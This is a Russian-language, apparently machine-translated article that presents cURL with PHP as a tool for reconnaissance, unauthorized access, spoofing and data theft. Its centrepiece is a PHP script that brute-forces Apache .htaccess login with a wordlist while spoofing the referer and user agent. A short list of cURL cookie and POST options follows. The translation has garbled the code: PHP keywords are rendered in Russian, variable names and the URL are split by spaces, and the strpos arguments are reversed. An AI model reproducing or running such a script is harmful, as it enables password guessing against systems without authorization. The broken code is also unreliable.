CURL инструмент, который можно использовать для принудительного ввода параметров в веб-запрос

cURL  ( Client URL_, библиотека, созданная Дэниелом Стенбергом, представляет собой инструмент, основанный преимущественно на командной строке, который можно использовать для принудительного ввода параметров в веб-запрос. Библиотека cURL была портирована на PHP как дополнительный модуль и может быть полезна при попытке получить разведывательную информацию или несанкционированный доступ к указанному URL.

CURL и PHP

PHP поддерживает libcurl, который в настоящее время поддерживает протоколы http, https, ftp, gopher, telnet, dict, file и ldap. libcurl также поддерживает сертификаты HTTPS, HTTP POST, HTTP PUT, загрузку по FTP (это также можно сделать с расширением ftp в PHP), загрузку на основе форм HTTP, прокси-серверы, файлы cookie и аутентификацию пользователя + пароль. cURL может использоваться в сочетании с PHP-сценариями для атак методом перебора (включая перебор таблицы SQL-инъекций), разведывательных атак, подмены и кражи данных.

Сценарий грубой силы

Следующий скрипт cURL может быть использован для грубой принудительной аутентификации Apache .htaccess:

<? php 
$ ref  =  "http://www.example.com/index.php" ;       // Установить реферер на обман
 
$ denied  =  "Запрещено" ;                           // Устанавливаем вывод "Отклонено"
 
$ wordlist  =  "/var/www/wordlist.txt" ;             // Установить местоположение списка слов
 
set_time_limit (  0  ) ;                             // Установить лимит выполнения скрипта. 0 = без ограничений
 
$ ch  =  curl_init (  ) ;                              // Инициализация cURL 
curl_setopt (  $ ch , CURLOPT_RETURNTRANSFER ,  1 ) ;    // Установить RETURNTRANSFER в TRUE 
curl_setopt (  $ ch , CURLOPT_FOLLOWLOCATION ,  1 ) ;    // Установить FOLLOWLOCATION в TRUE 
curl_setopt (  $ ch , CURLOPT_REFERER ,  $ ref ) ;         // Установить для REFERER значение $ ref 
curl_setopt (  $ ch , CURLOPT_USERAGENT , «Mozilla / 4.0 (совместимо; MSIE 5.01; Windows NT 5.0)» ) ;  // Spoof User Agent
 
foreach (  файл (  $ wordlist  )  как  $ пароль  )        // Запуск цикла для атаки по словарю 
{ 
    $ force  =  "http: // admin: {$ password} @ www.example.com / admin /" ;  // Установить URL для атаки, 
    curl_setopt (  $ ch , CURLOPT_URL ,  $ force  ) ;       // Загружаем URL для атаки с помощью cURL 
    $ check  =  curl_exec (  $ ch  ) ;                   // Установить параметры для проверки, 
    если (  ! Strpos (  $ denied , $ check  )  )              // Проверяем, нет ли $ denied на странице 
    { 
        die (  "Успешно! Пароль: {$ password} "  ) ;  // Если $ denied возвращает false, успех 
    } 
} 
curl_close (  $ ch  ) ;                               // Закрыть процесс cURL 
?>

Полезные опции PHP cURL

CURLOPT_FOLLOWLOCATION

• ВЕРНО, чтобы следовать любому заголовку «Location:», который сервер отправляет как часть заголовка HTTP (обратите внимание, что это рекурсивно, PHP будет следовать столько же заголовков «Location:», сколько отправлено, если не установлено CURLOPT_MAXREDIRS ).

CURLOPT_POST

• CURLOPT_POSTFIELDS

CURLOPT_COOKIE

• Содержимое заголовка «Set-Cookie:» для использования в HTTP-запросе.

CURLOPT_COOKIEFILE

• Имя файла, содержащего данные cookie. Файл cookie может быть в формате Netscape или просто в виде заголовков в стиле HTTP, выгруженных в файл.

CURLOPT_COOKIEJAR

• Имя файла, в который сохраняются все внутренние куки, когда соединение закрывается.